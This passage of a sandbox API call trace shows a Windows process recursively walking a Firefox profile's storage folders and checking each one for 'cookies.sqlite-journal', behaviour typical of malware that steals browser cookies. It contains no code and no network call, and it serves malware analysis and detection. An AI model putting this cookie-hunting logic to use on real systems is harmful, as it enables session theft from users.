lpFindFileData=0x7aaef30) returned 1 [0251.350] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.350] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.350] FindClose (in: hFindFile=0x44079a0 | out: hFindFile=0x44079a0) returned 1 [0251.351] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.351] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.351] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.351] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.351] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.351] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.351] lstrlenW (lpString="storage") returned 7 [0251.351] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="storage" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage" [0251.351] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0251.351] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", lpDst=0x7aaf190, nSize=0x58 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage") returned 0x58 [0251.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage") returned 87 [0251.351] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.351] PathCombineW (in: pszDest=0x7aaf250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\cookies.sqlite-journal" [0251.351] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.352] PathCombineW (in: pszDest=0x7aaf250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*" [0251.352] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x44079a0 [0251.352] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.352] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.352] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.352] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.352] lstrlenW (lpString="permanent") returned 9 [0251.352] PathCombineW (in: pszDest=0x7aaf250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", pszFile="permanent" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent" [0251.371] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0251.371] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", lpDst=0x79c86a0, nSize=0x62 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned 0x62 [0251.371] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned 97 [0251.371] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.371] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\cookies.sqlite-journal" [0251.371] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\cookies.sqlite-journal", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0251.371] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*" [0251.371] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x4406e60 [0251.371] FindNextFileW (in: hFindFile=0x4406e60, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.372] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.372] FindNextFileW (in: hFindFile=0x4406e60, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.372] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.372] lstrlenW (lpString="chrome") returned 6 [0251.372] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="chrome" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome" [0251.372] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x69 [0251.372] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", lpDst=0x79c5b70, nSize=0x69 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned 0x69 [0251.372] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned 104 [0251.372] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.372] PathCombineW (in: pszDest=0x79c5c50, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\cookies.sqlite-journal" [0251.372] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\cookies.sqlite-journal", lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 0xffffffffffffffff [0251.372] PathCombineW (in: pszDest=0x79c5c50, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*" [0251.372] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*", lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 0x44064a0 [0251.372] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 1 [0251.372] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.372] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 1 [0251.372] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.372] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 1 [0251.373] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.373] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 1 [0251.373] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.373] lstrlenW (lpString="idb") returned 3 [0251.373] PathCombineW (in: pszDest=0x79c5c50, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="idb" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb" [0251.373] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x6d [0251.373] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", lpDst=0x79c5e60, nSize=0x6d | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned 0x6d [0251.373] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned 108 [0251.373] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.373] PathCombineW (in: pszDest=0x79c8bc0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\cookies.sqlite-journal" [0251.374] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\cookies.sqlite-journal", lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 0xffffffffffffffff [0251.385] PathCombineW (in: pszDest=0x79c8bc0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*" [0251.385] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*", lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 0x4406e00 [0251.385] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 1 [0251.385] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.385] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 1 [0251.385] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.385] lstrlenW (lpString="2918063365piupsah.files") returned 23 [0251.385] PathCombineW (in: pszDest=0x79c8bc0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="2918063365piupsah.files" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0251.385] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x85 [0251.385] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", lpDst=0x79c9030, nSize=0x85 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned 0x85 [0251.385] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned 132 [0251.385] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.385] PathCombineW (in: pszDest=0x79c9150, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\cookies.sqlite-journal" [0251.385] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\cookies.sqlite-journal", lpFindFileData=0x79c8dd0 | out: lpFindFileData=0x79c8dd0) returned 0xffffffffffffffff [0251.385] PathCombineW (in: pszDest=0x79c9150, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*" [0251.386] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*", lpFindFileData=0x79c8dd0 | out: lpFindFileData=0x79c8dd0) returned 0x44067a0 [0251.386] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c8dd0 | out: lpFindFileData=0x79c8dd0) returned 1 [0251.386] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.386] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c8dd0 | out: lpFindFileData=0x79c8dd0) returned 0 [0251.386] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.386] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 1 [0251.386] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.386] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 0 [0251.386] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.386] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 0 [0251.386] FindClose (in: hFindFile=0x44064a0 | out: hFindFile=0x44064a0) returned 1 [0251.386] FindNextFileW (in: hFindFile=0x4406e60, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.386] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.386] lstrlenW (lpString="moz-safe-about+home") returned 19 [0251.386] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="moz-safe-about+home" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home" [0251.387] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x76 [0251.387] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", lpDst=0x79c5b70, nSize=0x76 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned 0x76 [0251.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned 117 [0251.387] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.387] PathCombineW (in: pszDest=0x79c5c70, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\cookies.sqlite-journal" [0251.387] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\cookies.sqlite-journal", lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 0xffffffffffffffff [0251.387] PathCombineW (in: pszDest=0x79c5c70, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*" [0251.387] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*", lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 0x44064a0 [0251.387] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 1 [0251.387] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.387] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 1 [0251.387] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.387] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 1 [0251.387] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.387] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c5910 | out: lpFindFileData=0x79c5910) returned 1 [0251.387] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.387] lstrlenW (lpString="idb") returned 3 [0251.387] PathCombineW (in: pszDest=0x79c5c70, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="idb" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb" [0251.387] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x7a [0251.388] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", lpDst=0x79c8bc0, nSize=0x7a | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned 0x7a [0251.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned 121 [0251.388] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.388] PathCombineW (in: pszDest=0x79c8cc0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\cookies.sqlite-journal" [0251.388] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\cookies.sqlite-journal", lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 0xffffffffffffffff [0251.388] PathCombineW (in: pszDest=0x79c8cc0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*" [0251.388] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*", lpFindFileData=0x79c8960 | out: lpFindFileData=0x79c8960) returned 0x44067a0 